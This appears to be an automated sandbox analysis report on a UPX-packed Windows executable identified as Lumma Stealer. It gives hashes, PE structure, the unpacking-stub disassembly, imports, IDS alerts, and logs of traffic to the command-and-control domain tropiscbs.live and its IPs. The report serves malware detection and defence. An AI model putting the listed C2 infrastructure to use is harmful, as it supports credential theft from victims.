                                                                      SHA256:4ba36a1aa022e87ce24ff7030e64e630d3652d7d5ab5ebb8368f27ebad47bcc3
                                                                      SHA512:fbfef62a5948a9a9ab0fc97ea88969376ceaf3d01976bc8996cf9d455b731c11aeb66828498be0821c0428ac6f3019d2a677f7aef70af776f46dae89b74fe7f3
                                                                      SSDEEP:3072:2MwSkCBozaSJp2Y1OMKKYgmRuD5OzC1TsaFDeZDPzz1VNfFQjA5zF6hp5kusBRiZ:2MOJpMMKPDpKWDPzzRfXpApWRpm
                                                                      TLSH:C8F31235ADB211BDE86388F0A9DE3E6C036B005829CB70ED3517A3239677B597563B12
                                                                      File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......h.....................................@....@..........................P............@..................................@..x..

                                                                      File Icon

                                                                      Icon Hash:90cececece8e8eb0

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x462e80
                                                                      Entrypoint Section:UPX1
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x680CF1FB [Sat Apr 26 14:47:23 2025 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:6
                                                                      OS Version Minor:0
                                                                      File Version Major:6
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:6
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:42d476bd6c4e105e3a5e1538b871b450
                                                                      Instruction
                                                                      pushad
                                                                      mov esi, 0043A00Dh
                                                                      lea edi, dword ptr [esi-0003900Dh]
                                                                      push edi
                                                                      or ebp, FFFFFFFFh
                                                                      jmp 00007F662CE01FC2h
                                                                      nop
                                                                      nop
                                                                      nop
                                                                      nop
                                                                      nop
                                                                      nop
                                                                      mov al, byte ptr [esi]
                                                                      inc esi
                                                                      mov byte ptr [edi], al
                                                                      inc edi
                                                                      add ebx, ebx
                                                                      jne 00007F662CE01FB9h
                                                                      mov ebx, dword ptr [esi]
                                                                      sub esi, FFFFFFFCh
                                                                      adc ebx, ebx
                                                                      jc 00007F662CE01F9Fh
                                                                      mov eax, 00000001h
                                                                      add ebx, ebx
                                                                      jne 00007F662CE01FB9h
                                                                      mov ebx, dword ptr [esi]
                                                                      sub esi, FFFFFFFCh
                                                                      adc ebx, ebx
                                                                      adc eax, eax
                                                                      add ebx, ebx
                                                                      jnc 00007F662CE01FBDh
                                                                      jne 00007F662CE01FDAh
                                                                      mov ebx, dword ptr [esi]
                                                                      sub esi, FFFFFFFCh
                                                                      adc ebx, ebx
                                                                      jc 00007F662CE01FD1h
                                                                      dec eax
                                                                      add ebx, ebx
                                                                      jne 00007F662CE01FB9h
                                                                      mov ebx, dword ptr [esi]
                                                                      sub esi, FFFFFFFCh
                                                                      adc ebx, ebx
                                                                      adc eax, eax
                                                                      jmp 00007F662CE01F86h
                                                                      add ebx, ebx
                                                                      jne 00007F662CE01FB9h
                                                                      mov ebx, dword ptr [esi]
                                                                      sub esi, FFFFFFFCh
                                                                      adc ebx, ebx
                                                                      adc ecx, ecx
                                                                      jmp 00007F662CE02004h
                                                                      xor ecx, ecx
                                                                      sub eax, 03h
                                                                      jc 00007F662CE01FC3h
                                                                      shl eax, 08h
                                                                      mov al, byte ptr [esi]
                                                                      inc esi
                                                                      xor eax, FFFFFFFFh
                                                                      je 00007F662CE02027h
                                                                      sar eax, 1
                                                                      mov ebp, eax
                                                                      jmp 00007F662CE01FBDh
                                                                      add ebx, ebx
                                                                      jne 00007F662CE01FB9h
                                                                      mov ebx, dword ptr [esi]
                                                                      sub esi, FFFFFFFCh
                                                                      adc ebx, ebx
                                                                      jc 00007F662CE01F7Eh
                                                                      inc ecx
                                                                      add ebx, ebx
                                                                      jne 00007F662CE01FB9h
                                                                      mov ebx, dword ptr [esi]
                                                                      sub esi, FFFFFFFCh
                                                                      adc ebx, ebx
                                                                      jc 00007F662CE01F70h
                                                                      add ebx, ebx
                                                                      jne 00007F662CE01FB9h
                                                                      mov ebx, dword ptr [esi]
                                                                      sub esi, FFFFFFFCh
                                                                      adc ebx, ebx
                                                                      adc ecx, ecx
                                                                      add ebx, ebx
                                                                      jnc 00007F662CE01FA1h
                                                                      jne 00007F662CE01FBBh
                                                                      mov ebx, dword ptr [esi]
                                                                      sub esi, FFFFFFFCh
                                                                      adc ebx, ebx
                                                                      jnc 00007F662CE01F96h
                                                                      add ecx, 02h
                                                                      cmp ebp, FFFFFB00h
                                                                      adc ecx, 02h
                                                                      lea edx, dword ptr [eax+eax]
                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x640000x178UPX2
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x641780xcUPX2
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      UPX00x10000x390000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      UPX10x3a0000x2a0000x2920029e8f87aa566ed9597407d60765631baFalse0.9898781819908815data7.934789695763534IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      UPX20x640000x10000x20042f2db479e3a90651f2c52d12626a5b2False0.451171875data3.251965079275098IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      DLLImport
                                                                      GDI32.dllBitBlt
                                                                      KERNEL32.DLLLoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect
                                                                      ole32.dllCoInitialize
                                                                      OLEAUT32.dllVariantInit
                                                                      SHELL32.dllSHGetFileInfoW
                                                                      USER32.dllGetDC

                                                                      Network Behavior

                                                                      Download Network PCAP: filteredfull

                                                                      Suricata IDS Alerts

                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                      2025-04-27T18:36:32.180353+02002061859ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tropiscbs .live)1192.168.2.4533041.1.1.153UDP
                                                                      2025-04-27T18:36:32.751218+02002061860ET MALWARE Observed Win32/Lumma Stealer Related Domain (tropiscbs .live) in TLS SNI1192.168.2.449710104.21.77.203443TCP
                                                                      2025-04-27T18:36:32.751218+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449710104.21.77.203443TCP
                                                                      2025-04-27T18:36:34.823970+02002061860ET MALWARE Observed Win32/Lumma Stealer Related Domain (tropiscbs .live) in TLS SNI1192.168.2.449711104.21.77.203443TCP
                                                                      2025-04-27T18:36:34.823970+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449711104.21.77.203443TCP
                                                                      2025-04-27T18:36:36.252016+02002061860ET MALWARE Observed Win32/Lumma Stealer Related Domain (tropiscbs .live) in TLS SNI1192.168.2.449712104.21.77.203443TCP
                                                                      2025-04-27T18:36:36.252016+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449712104.21.77.203443TCP
                                                                      2025-04-27T18:36:37.688311+02002061860ET MALWARE Observed Win32/Lumma Stealer Related Domain (tropiscbs .live) in TLS SNI1192.168.2.449715104.21.77.203443TCP
                                                                      2025-04-27T18:36:37.688311+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449715104.21.77.203443TCP
                                                                      2025-04-27T18:36:40.067823+02002061860ET MALWARE Observed Win32/Lumma Stealer Related Domain (tropiscbs .live) in TLS SNI1192.168.2.449717104.21.77.203443TCP
                                                                      2025-04-27T18:36:40.067823+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449717104.21.77.203443TCP
                                                                      2025-04-27T18:36:41.654673+02002061860ET MALWARE Observed Win32/Lumma Stealer Related Domain (tropiscbs .live) in TLS SNI1192.168.2.449718104.21.77.203443TCP
                                                                      2025-04-27T18:36:41.654673+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449718104.21.77.203443TCP
                                                                      2025-04-27T18:36:44.706836+02002061860ET MALWARE Observed Win32/Lumma Stealer Related Domain (tropiscbs .live) in TLS SNI1192.168.2.449721104.21.77.203443TCP
                                                                      2025-04-27T18:36:44.706836+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449721104.21.77.203443TCP

                                                                      Network Port Distribution

                                                                      • Total Packets: 99
                                                                      • 443 (HTTPS)
                                                                      • 53 (DNS)
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Apr 27, 2025 18:36:32.412964106 CEST49710443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:32.413022041 CEST44349710104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:32.413130999 CEST49710443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:32.433971882 CEST49710443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:32.433996916 CEST44349710104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:32.751034975 CEST44349710104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:32.751218081 CEST49710443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:32.755515099 CEST49710443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:32.755537033 CEST44349710104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:32.755850077 CEST44349710104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:32.803136110 CEST49710443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:32.808598042 CEST49710443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:32.808614016 CEST49710443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:32.808737040 CEST44349710104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:33.564313889 CEST44349710104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:33.564364910 CEST44349710104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:33.564390898 CEST44349710104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:33.564416885 CEST44349710104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:33.564441919 CEST44349710104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:33.564462900 CEST44349710104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:33.564469099 CEST49710443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:33.564469099 CEST49710443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:33.564537048 CEST44349710104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:33.564589977 CEST49710443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:33.564649105 CEST44349710104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:33.564702988 CEST49710443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:33.564718962 CEST44349710104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:33.565032959 CEST44349710104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:33.565083981 CEST49710443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:33.565095901 CEST44349710104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:33.585289001 CEST44349710104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:33.585328102 CEST44349710104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:33.585369110 CEST49710443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:33.585397959 CEST44349710104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:33.585444927 CEST49710443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:33.746228933 CEST44349710104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:33.746320009 CEST44349710104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:33.746350050 CEST44349710104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:33.746393919 CEST49710443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:33.746474028 CEST44349710104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:33.746534109 CEST49710443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:33.746771097 CEST44349710104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:33.746848106 CEST44349710104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:33.746901989 CEST49710443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:33.746917963 CEST44349710104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:33.747688055 CEST44349710104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:33.747728109 CEST44349710104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:33.747739077 CEST49710443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:33.747751951 CEST44349710104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:33.747807026 CEST49710443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:33.747817993 CEST44349710104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:33.748508930 CEST44349710104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:33.748536110 CEST44349710104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:33.748567104 CEST44349710104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:33.748569965 CEST49710443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:33.748584032 CEST44349710104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:33.748625040 CEST49710443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:33.748644114 CEST44349710104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:33.748699903 CEST49710443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:33.751168013 CEST49710443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:33.751209974 CEST44349710104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:33.751238108 CEST49710443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:33.751252890 CEST44349710104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:34.514836073 CEST49711443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:34.514895916 CEST44349711104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:34.514985085 CEST49711443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:34.515357018 CEST49711443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:34.515368938 CEST44349711104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:34.823898077 CEST44349711104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:34.823970079 CEST49711443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:34.825726032 CEST49711443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:34.825736046 CEST44349711104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:34.825982094 CEST44349711104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:34.827222109 CEST49711443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:34.827373028 CEST49711443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:34.827399015 CEST44349711104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:34.827461004 CEST49711443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:34.827467918 CEST44349711104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:35.752438068 CEST44349711104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:35.752579927 CEST44349711104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:35.752662897 CEST49711443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:35.752857924 CEST49711443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:35.752876997 CEST44349711104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:35.942640066 CEST49712443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:35.942698956 CEST44349712104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:35.942847967 CEST49712443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:35.943178892 CEST49712443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:35.943197966 CEST44349712104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:36.251903057 CEST44349712104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:36.252016068 CEST49712443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:36.253371954 CEST49712443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:36.253386021 CEST44349712104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:36.253688097 CEST44349712104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:36.255070925 CEST49712443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:36.255202055 CEST49712443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:36.255244017 CEST44349712104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:37.116149902 CEST44349712104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:37.116297960 CEST44349712104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:37.116367102 CEST49712443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:37.116414070 CEST49712443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:37.116431952 CEST44349712104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:37.381582975 CEST49715443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:37.381639957 CEST44349715104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:37.381702900 CEST49715443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:37.382030010 CEST49715443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:37.382042885 CEST44349715104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:37.688231945 CEST44349715104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:37.688311100 CEST49715443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:37.689538956 CEST49715443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:37.689549923 CEST44349715104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:37.689769030 CEST44349715104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:37.690956116 CEST49715443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:37.691096067 CEST49715443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:37.691117048 CEST44349715104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:37.691191912 CEST49715443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:37.691191912 CEST49715443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:37.691199064 CEST44349715104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:37.732268095 CEST44349715104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:38.620965004 CEST44349715104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:38.621078968 CEST44349715104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:38.621211052 CEST49715443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:38.621330976 CEST49715443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:38.621349096 CEST44349715104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:39.760216951 CEST49717443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:39.760272026 CEST44349717104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:39.760390997 CEST49717443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:39.760720968 CEST49717443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:39.760734081 CEST44349717104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:40.067260981 CEST44349717104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:40.067822933 CEST49717443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:40.069616079 CEST49717443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:40.069632053 CEST44349717104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:40.069885015 CEST44349717104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:40.071309090 CEST49717443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:40.071309090 CEST49717443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:40.071338892 CEST44349717104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:40.836854935 CEST44349717104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:40.836976051 CEST44349717104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:40.837025881 CEST49717443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:40.837234974 CEST49717443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:40.837256908 CEST44349717104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:41.347058058 CEST49718443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:41.347095013 CEST44349718104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:41.347171068 CEST49718443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:41.347615957 CEST49718443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:41.347629070 CEST44349718104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:41.654573917 CEST44349718104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:41.654673100 CEST49718443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:41.655939102 CEST49718443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:41.655946016 CEST44349718104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:41.656183004 CEST44349718104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:41.657440901 CEST49718443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:41.658149004 CEST49718443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:41.658184052 CEST44349718104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:41.658271074 CEST49718443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:41.658305883 CEST44349718104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:41.658397913 CEST49718443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:41.658440113 CEST44349718104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:41.658534050 CEST49718443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:41.658557892 CEST44349718104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:41.658669949 CEST49718443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:41.658696890 CEST44349718104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:41.658822060 CEST49718443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:41.658848047 CEST44349718104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:41.658855915 CEST49718443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:41.658971071 CEST49718443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:41.659001112 CEST49718443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:41.704268932 CEST44349718104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:41.704416990 CEST49718443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:41.704447031 CEST49718443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:41.704456091 CEST49718443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:41.752264977 CEST44349718104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:41.752571106 CEST49718443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:41.752621889 CEST49718443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:41.752654076 CEST49718443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:41.800268888 CEST44349718104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:41.800399065 CEST49718443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:41.848282099 CEST44349718104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:42.107753038 CEST44349718104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:44.332032919 CEST44349718104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:44.332140923 CEST44349718104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:44.332218885 CEST49718443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:44.332344055 CEST49718443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:44.332355022 CEST44349718104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:44.392538071 CEST49721443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:44.392585039 CEST44349721104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:44.392848969 CEST49721443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:44.393182993 CEST49721443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:44.393194914 CEST44349721104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:44.706757069 CEST44349721104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:44.706835985 CEST49721443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:44.708271027 CEST49721443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:44.708292961 CEST44349721104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:44.708542109 CEST44349721104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:44.709938049 CEST49721443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:44.709965944 CEST49721443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:44.710028887 CEST44349721104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:45.529730082 CEST44349721104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:45.529789925 CEST44349721104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:45.529946089 CEST49721443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:45.530088902 CEST49721443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:45.530107021 CEST44349721104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:45.530119896 CEST49721443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:45.530124903 CEST44349721104.21.77.203192.168.2.4
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Apr 27, 2025 18:36:32.180352926 CEST5330453192.168.2.41.1.1.1
                                                                      Apr 27, 2025 18:36:32.399466038 CEST53533041.1.1.1192.168.2.4

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Apr 27, 2025 18:36:32.180352926 CEST192.168.2.41.1.1.10xb45fStandard query (0)tropiscbs.liveA (IP address)IN (0x0001)false

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Apr 27, 2025 18:36:32.399466038 CEST1.1.1.1192.168.2.40xb45fNo error (0)tropiscbs.live104.21.77.203A (IP address)IN (0x0001)false
                                                                      Apr 27, 2025 18:36:32.399466038 CEST1.1.1.1192.168.2.40xb45fNo error (0)tropiscbs.live172.67.211.127A (IP address)IN (0x0001)false

                                                                      HTTP Request Dependency Graph

                                                                      • tropiscbs.live

                                                                      HTTPS Proxied Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
